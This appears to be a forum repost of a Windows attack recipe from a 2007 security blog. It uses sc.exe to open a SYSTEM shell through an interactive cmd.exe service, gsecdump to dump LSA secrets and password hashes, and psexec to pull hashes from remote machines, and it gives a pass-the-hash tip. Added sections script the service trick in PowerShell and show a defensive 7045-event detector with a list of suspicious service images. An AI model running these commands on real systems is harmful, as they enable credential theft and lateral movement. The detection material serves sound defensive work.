To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

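The sc.exe sequence quoted above, wrapped up as an added PowerShell example (not code from the original post or from truesec): it runs the create/start/delete steps, treats the 1053 timeout as the expected outcome, and always removes the service registration afterwards. It assumes an elevated (local Administrator) prompt on an XP/2003-era host, that $env:SystemRoot is the C:\WINDOWS of the post, and that sc.exe exits with the Win32 error code of the failed call, which is what the 1053 check relies on. Two caveats a practitioner should keep in mind: creating a service already needs SC_MANAGER_CREATE_SERVICE, so this is admin-to-SYSTEM rather than a user-to-SYSTEM escalation; and from Vista on, services run in session 0, so the window does not appear on the user's desktop, while current Windows 10/11 builds refuse interactive services altogether.

```powershell
# Added example, not code from the original post or from truesec.
# Assumes: an elevated (local Administrator) PowerShell prompt on an XP/2003-era
# host, and that sc.exe exits with the Win32 error code of the failed call.
# Creating a service needs SC_MANAGER_CREATE_SERVICE, so this is admin -> SYSTEM.

$svc = 'shellcmdline'
# "/K start": the first cmd.exe runs "start", which opens a second cmd.exe window
# as its own process, so the SYSTEM shell does not depend on the service process.
$image = "$env:SystemRoot\System32\cmd.exe /K start"

# 1. Register cmd.exe as an own-process, interactive service.
#    (In PowerShell "sc" is an alias for Set-Content; call sc.exe explicitly.)
sc.exe create $svc binpath= $image type= own type= interact
if ($LASTEXITCODE -ne 0) { throw "CreateService failed with error $LASTEXITCODE" }

try {
    # 2. Start it. The SCM launches cmd.exe as LocalSystem right away, but cmd.exe
    #    never calls StartServiceCtrlDispatcher, so after the service start timeout
    #    (30 s by default) sc.exe reports 1053, ERROR_SERVICE_REQUEST_TIMEOUT.
    #    That failure is the expected outcome; the SYSTEM window is already open.
    sc.exe start $svc
    switch ($LASTEXITCODE) {
        0       { Write-Host 'Unexpected: the service reported a clean start.' }
        1053    { Write-Host 'Got 1053 as expected; look for the new cmd.exe window running as SYSTEM.' }
        default { throw "StartService failed with error $LASTEXITCODE" }
    }
}
finally {
    # 3. Always remove the registration so no SYSTEM-shell service is left behind.
    sc.exe delete $svc | Out-Null
}
```

The finally block matters in practice: a leftover service whose image is cmd.exe is a persistent SYSTEM shell for anyone who can start services, which is exactly what the sc delete in the original sequence is there to prevent.
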
A tip: you can use iam from the pshtools toolkit to load the hashes just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, don't actually need to be cracked at all; it's just a matter of using the tools. As the original puts it, whether the password is 4 characters or 127, once you have the hash you're 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing. What a gap.
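Every service installation, including the shellcmdline service from the quoted procedure and the PSEXESVC service that psexec -c drops on the remote host, is recorded on Vista and later as System event 7045 ("A service was installed in the system") together with the image path and the account. Below is an added detection example in PowerShell (not code from the original post) that parses 7045 message bodies and flags service images that look like an interactive shell or a remote-execution stub. The three sample messages are constructed for the demo; the shellcmdline name and cmd.exe path come from the post, PSEXESVC is the name Sysinternals PsExec gives its remote service, and ExampleSvc is a made-up benign service.

```powershell
# Added detection example, not code from the original post.
# Parses the message body of System event 7045 ("A service was installed in the
# system", Vista and later) and flags service images that look like the trick
# quoted above. The three sample messages below are constructed for this demo.

# Image-path fragments that should not appear in a freshly installed service:
# interactive shells / LOLBins and the PsExec remote service stub.
$suspiciousImages = @(
    'cmd\.exe', 'powershell\.exe', 'rundll32\.exe', 'regsvr32\.exe', 'mshta\.exe',
    'psexesvc\.exe', 'gsecdump'
)

function ConvertFrom-ServiceInstallMessage {
    # Pull the three fields we need out of a 7045 message body.
    param([string]$Message)
    $name = ''; $image = ''; $account = ''
    if ($Message -match 'Service Name:\s*(.+)')      { $name    = $Matches[1].Trim() }
    if ($Message -match 'Service File Name:\s*(.+)') { $image   = $Matches[1].Trim() }
    if ($Message -match 'Service Account:\s*(.+)')   { $account = $Matches[1].Trim() }
    [pscustomobject]@{ Name = $name; Image = $image; Account = $account }
}

function Test-SuspiciousServiceInstall {
    # Returns the reasons an install looks bad; nothing returned means clean.
    param([string]$ImagePath, [string]$Account)
    $reasons = @()
    foreach ($pattern in $suspiciousImages) {
        if ($ImagePath -match $pattern) { $reasons += "image matches '$pattern'" }
    }
    # A LocalSystem image launched with a "/K ..." or "/C ..." tail is an
    # interactive or one-shot command line, not a real service binary.
    if ($Account -eq 'LocalSystem' -and $ImagePath -match '\.exe"?\s+/[KC]\b') {
        $reasons += 'LocalSystem image runs with a /K or /C command tail'
    }
    return $reasons
}

# Constructed sample 7045 bodies (not real log data): the shellcmdline service
# from the post, the PSEXESVC stub that "psexec -c" drops, and a benign service.
$sampleShell = @"
A service was installed in the system.

Service Name:  shellcmdline
Service File Name:  C:\WINDOWS\system32\cmd.exe /K start
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem
"@
$samplePsExec = @"
A service was installed in the system.

Service Name:  PSEXESVC
Service File Name:  %SystemRoot%\PSEXESVC.exe
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem
"@
$sampleBenign = @"
A service was installed in the system.

Service Name:  ExampleSvc
Service File Name:  "C:\Program Files\Example\ExampleSvc.exe"
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  NT AUTHORITY\LocalService
"@

foreach ($body in @($sampleShell, $samplePsExec, $sampleBenign)) {
    $evt = ConvertFrom-ServiceInstallMessage $body
    $why = Test-SuspiciousServiceInstall -ImagePath $evt.Image -Account $evt.Account
    if ($why) {
        Write-Host ("ALERT  {0,-13} {1}  [{2}]" -f $evt.Name, $evt.Image, ($why -join '; '))
    } else {
        Write-Host ("ok     {0,-13} {1}" -f $evt.Name, $evt.Image)
    }
}

# On a live host, feed real events instead of the samples:
#   Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } |
#       ForEach-Object { ConvertFrom-ServiceInstallMessage $_.Message }
```

The two ALERT lines are the point: the sc create from the post shows up as a LocalSystem service whose image is cmd.exe with a /K tail, and a psexec -s -c run against a host leaves a PSEXESVC installation behind in the same log, so both halves of the quoted technique are visible to a defender who watches 7045.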